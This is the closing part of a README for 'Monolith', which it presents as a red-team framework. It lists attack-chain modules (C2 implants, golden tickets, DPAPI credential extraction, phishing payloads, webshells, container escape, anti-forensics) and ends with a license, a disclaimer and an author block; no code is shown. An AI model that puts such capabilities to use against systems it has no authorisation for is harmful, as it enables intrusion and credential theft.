└── Supply Chain Attack: ~1,400 lines
Attack Chain Modules:
├── C2 Implant → Lateral Movement → Golden Ticket
├── AutoExploit → PrivEsc → DPAPI Extract
├── Phishing → Payload Gen → WebShell
├── Cloud Pivot → K8s Warfare → Container Escape
├── Orbital RF → SIGINT → GPS/IMSI Collection
└── All modules → God Mode Anti-Forensics
## 🤝 Contributing
1. Fork the repository
2. Create feature branch (`git checkout -b feature/amazing-feature`)
3. Commit changes (`git commit -m 'Add amazing feature'`)
4. Push to branch (`git push origin feature/amazing-feature`)
5. Open Pull Request
## 📜 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## ⚠️ Legal Disclaimer
This tool is provided for **educational and authorized security testing purposes only**. Users are responsible for obtaining proper authorization before testing any systems. The author assumes no liability for misuse of this software.
**DO NOT use this tool for illegal activities.**
## 👤 Author
**ITherso**
- GitHub: [@ITherso](https://github.com/ITherso)
- Project: [Monolith](https://github.com/ITherso/monolith)
┌─────────────────────────────────────────────────────────────────┐
│ │
│ 🔴 MONOLITH - Elite Red Team Framework │
│ Built with ❤️ by ITherso │
│ v2.5 - February 2026 │
│ │
│ "Knowledge is power. Use it responsibly." │
│ │
└─────────────────────────────────────────────────────────────────┘
标签:C2框架, IP 地址批量处理, 安全学习资源, 安全规则引擎, 知识库安全, 网络调试, 自动化, 请求拦截, 逆向工具